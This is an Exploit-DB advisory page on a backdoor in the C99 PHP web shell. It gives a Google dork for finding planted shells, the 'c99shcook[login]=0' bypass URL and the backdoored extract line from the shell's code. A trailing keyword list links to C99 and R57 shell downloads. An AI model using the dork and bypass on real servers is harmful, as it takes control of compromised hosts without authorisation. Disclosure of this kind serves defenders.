C99Shell (Web Shell) - 'p' Authentication Bypass - Exploit-DB
Exploit Database -
Exploits
-
GHDB
-
Papers
-
Shellcodes
-
Search EDB
-
SearchSploit Manual
-
Submissions
-
Online Training
-
Stats
-
About Us
About Exploit-DB Exploit-DB History FAQ -
Search
EDB-ID:
34025
CVE:
EDB Verified:Author:
Mandat0ry
Type:
webapps
Exploit: /Platform:
PHP
Date:
2014-07-10
Vulnerable App: # Exploit Title: C99 Shell Authentication Bypass via Backdoor # Google Dork: inurl:c99.php # Date: June 23, 2014 # Exploit Author: mandatory ( Matthew Bryant ) # Vendor Homepage: http://ccteam.ru/ # Software Link: https://www.google.com/ # Version: < 1.00 beta # Tested on:Linux # CVE: N/A All C99.php shells are backdoored. To bypass authentication add "?c99shcook[login]=0" to the URL. e.g. http://127.0.0.1/c99.php?c99shcook[login]=0 The backdoor: @extract($_REQUEST["c99shcook"]); Which bypasses the authentication here: if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } For more info: http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/ ~mandatory Tags: Malware Advisory/Source: Link| Databases | Links | Sites | Solutions |
|---|---|---|---|
| Exploits | Search Exploit-DB | OffSec | Courses and Certifications |
| Google Hacking | Submit Entry | Kali Linux | Learn Subscriptions |
| Papers | SearchSploit Manual | VulnHub | OffSec Cyber Range |
| Shellcodes | Exploit Statistics | Proving Grounds | |
| Penetration Testing Services |
Từ khóa » C99.php
-
C99-Shell/p At Master · 4Hackerz/C99-Shell - GitHub
-
KaizenLouie/C99Shell-PHP7: PHP 7 And Safe-build ... - GitHub
-
C99 Shell
-
C99 Shell - Hacking Tools
-
Shell Indir, Logsuz Shell Indir, Shell Download, PHP Shells
-
PHP Malware C99 Shell - Mad Irish
-
R57 Shell C99 Shell Shell TXT Shell p p
-
R57 Shell | C99 Shell | Shell | TXT Shell | p | p ...
-
Backdoor.C99.PHP - Threat Encyclopedia - FortiGuard
-
dshell.c99 - Details, How To Fix, Malware Removal Guide
-
- C99shell
-
R57.txt - C99.txt - R57 Shell - C99 Shell - R57shell - C99shell - R57 - C99 ...
-
Every C99 / p Shell Is Backdoored (AKA Free Shells For ...